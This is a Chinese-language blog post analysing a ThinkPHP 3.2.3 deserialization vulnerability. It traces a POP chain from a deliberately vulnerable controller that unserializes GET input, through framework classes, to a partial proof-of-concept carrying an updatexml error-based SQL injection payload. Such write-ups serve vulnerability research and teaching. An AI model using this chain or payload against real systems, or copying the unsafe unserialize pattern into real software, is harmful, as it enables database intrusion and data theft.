Thinkphp3.2.3反序列化漏洞实例分析

斑斓带你走走新加坡

前言

ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加，一些潜在的威胁也逐渐暴露，本文给大家带来的是对Thinkphp3.2.3版本框架里面的反序列化漏洞进行分析，浅谈原理以及如何应用。

魔术方法

因为之前已经讲过了，这里就简单提一下，以下面这个魔术方法为例：

1. _destruct

复制代码

该方法的作用是，某个对象的所有引用都被删除或者当对象被显式销毁时执行。例如下面代码：

1. <?php
   
2. class User{
   
3.     public function __destruct()
   
4.     {
   
5.         echo "xino</br>";
   
6.     }
   
7. }
   
8. $test = new User();
   
9. $ser = serialize($test);
   
10. unserialize($ser);
    
11. ?>

复制代码

执行后会发现调用了魔术方法，我们要想办法来寻找代码之间的关系来构造 反序列化链，常见魔术方法如下：

了解完魔术方法如何触发后便开始我们TP3反序列化漏洞的学习之旅。

复现

这里我是用小皮面板搭建好环境后开始我们的分析，下面是主界面：

需要在控制器

1. IndexController.class.php

复制代码

处写入：

1. public function index(){
   
2.     unserialize(base64_decode($_GET[1]));
   
3. }

复制代码

首先走到

1. Library/Think/Image/Driver/Imagick.class.php

复制代码

，代码如下：

1. public function __destruct()
   
2.     {
   
3.         empty($this->img) || $this->img->destroy();
   
4.     }
   
5. }

复制代码

这里有一个可控的变量img,因为该变量走向了destory()，于是我们寻找一下：

1. Library/Think/Session/Driver/Memcache.class.php

复制代码

,该处有个一样的方法：

1. public function destroy($sessID)
   
2.     {
   
3.         return $this->handle->delete($this->sessionName . $sessID);
   
4.     }

复制代码

我们会发现handle和sessionName参数是可控，因为走向了delete函数,于是继续跟进寻找delete，在

1. Mode/Lite/Model.class.php

复制代码

处：

1.    public function delete($options = array())
   
2.     {
   
3.         $pk = $this->getPk();
   
4.         if (empty($options) && empty($this->options['where'])) {
   
5.             // 如果删除条件为空 则删除当前数据对象所对应的记录
   
6.             if (!empty($this->data) && isset($this->data[$pk])) {
   
7.                 return $this->delete($this->data[$pk]);
   
8.             } else {
   
9.                 return false;
   
10.             }
    
11.         }
    
12.         if (is_numeric($options) || is_string($options)) {
    
13.             // 根据主键删除记录
    
14.             if (strpos($options, ',')) {
    
15.                 $where[$pk] = array('IN', $options);
    
16.             } else {
    
17.                 $where[$pk] = $options;
    
18.             }
    
19.             $options          = array();
    
20.             $options['where'] = $where;
    
21.         }
    
22.         // 根据复合主键删除记录
    
23.         if (is_array($options) && (count($options) > 0) && is_array($pk)) {
    
24.             $count = 0;
    
25.             foreach (array_keys($options) as $key) {
    
26.                 if (is_int($key)) {
    
27.                     $count++;
    
28.                 }
    
29.             }
    
30.             if (count($pk) == $count) {
    
31.                 $i = 0;
    
32.                 foreach ($pk as $field) {
    
33.                     $where[$field] = $options[$i];
    
34.                     unset($options[$i++]);
    
35.                 }
    
36.                 $options['where'] = $where;
    
37.             } else {
    
38.                 return false;
    
39.             }
    
40.         }
    
41.         // 分析表达式
    
42.         $options = $this->_parseOptions($options);
    
43.         if (empty($options['where'])) {
    
44.             // 如果条件为空 不进行删除操作 除非设置 1=1
    
45.             return false;
    
46.         }
    
47.         if (is_array($options['where']) && isset($options['where'][$pk])) {
    
48.             $pkValue = $options['where'][$pk];
    
49.         }
    
50.         if (false === $this->_before_delete($options)) {
    
51.             return false;
    
52.         }
    
53.         $result = $this->db->delete($options);                //数据库驱动类中的delete()
    
54.         if (false !== $result && is_numeric($result)) {
    
55.             $data = array();
    
56.             if (isset($pkValue)) {
    
57.                 $data[$pk] = $pkValue;
    
58.             }
    
59.             $this->_after_delete($data, $options);
    
60.         }
    
61.         // 返回删除记录个数
    
62.         return $result;
    
63.     }

复制代码

这里比较复杂，需要分析一下，pk,pk,pk,data,$options参数都是可控的，第二次调用该函数后是调用db(

1. Library/Think/Db/Driver.class.php

复制代码

)里面的函数，进去看一下：

1. $table = $this-&gt;parseTable($options['table']);
   
2. $sql   = 'DELETE FROM ' . $table;
   
3. return $this-&gt;execute($sql, !empty($options['fetch_sql']) ? true : false);

复制代码

这里只贴了比较关键的代码，看到table经过parseTable处理之后进了sql语句，跟进了发现没有过滤什么，直接返回了数据，最后调用了execute，我们分析其代码：

1. public function execute($str,$fetchSql=false) {
   
2.         $this->initConnect(true);
   
3.         if ( !$this->_linkID ) return false;
   
4.         $this->queryStr = $str;
   
5.         if(!empty($this->bind)){
   
6.             $that   =   $this;
   
7.             $this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return '''.$that->escapeString($val).'''; },$this->bind));
   
8.         }
   
9.         if($fetchSql){
   
10.             return $this->queryStr;
    
11.         }

复制代码

看到第二行是一个初始化连接的代码，我们跟进到最后发现：

1. public function connect($config = '', $linkNum = 0, $autoConnection = false)
   
2.     {
   
3.         if (!isset($this->linkID[$linkNum])) {
   
4.             if (empty($config)) {
   
5.                 $config = $this->config;
   
6.             }
   
7.             try {
   
8.                 if (empty($config['dsn'])) {
   
9.                     $config['dsn'] = $this->parseDsn($config);
   
10.                 }
    
11.                 if (version_compare(PHP_VERSION, '5.3.6', '<=')) {
    
12.                     // 禁用模拟预处理语句
    
13.                     $this->options[PDO::ATTR_EMULATE_PREPARES] = false;
    
14.                 }
    
15.                 $this->linkID[$linkNum] = new PDO($config['dsn'], $config['username'], $config['password'], $this->options);
    
16.             } catch (\PDOException $e) {
    
17.                 if ($autoConnection) {
    
18.                     trace($e->getMessage(), '', 'ERR');
    
19.                     return $this->connect($autoConnection, $linkNum);
    
20.                 } elseif ($config['debug']) {
    
21.                     E($e->getMessage());
    
22.                 }
    
23.             }
    
24.         }
    
25.         return $this->linkID[$linkNum];
    
26.     }

复制代码

可以通过里面的相应代码：

1. $this->config

复制代码

建立数据库连接，整个的POP链跟进顺序如下：

1. __destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->

复制代码

因为构造poc较长，这里只贴关键处，有兴趣的小伙伴可以自行去构造:

1.   public function __construct(){
   
2.             $this->db = new Mysql();
   
3.             $this->options['where'] = '';
   
4.             $this->pk = 'id';
   
5.             $this->data[$this->pk] = array(
   
6.                 "table" => "name where 1=updatexml(1,user(),1)#",
   
7.                 "where" => "1=1"
   
8.             ); }

复制代码

生成后传入payload即可实现错报注入，体现在payload里就是table这个语句，经过一串的操作使之与数据库连接来执行sql语句：

结语

给大家带来了tp3的反序列化漏洞分析，主要还是要理清各个链的关系以及如何让它们联系起来，有兴趣的小伙伴可以自己去搭建尝试，喜欢本文的小伙伴希望可以一键三连支持一下。
以上就是Thinkphp3.2.3反序列化漏洞实例分析的详细内容，更多关于Thinkphp 反序列化漏洞的资料请关注脚本之家其它相关文章！

来源:https://www.jb51.net/article/276322.htm
免责声明：由于采集信息均来自互联网，如果侵犯了您的权益，请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容，谢谢合作！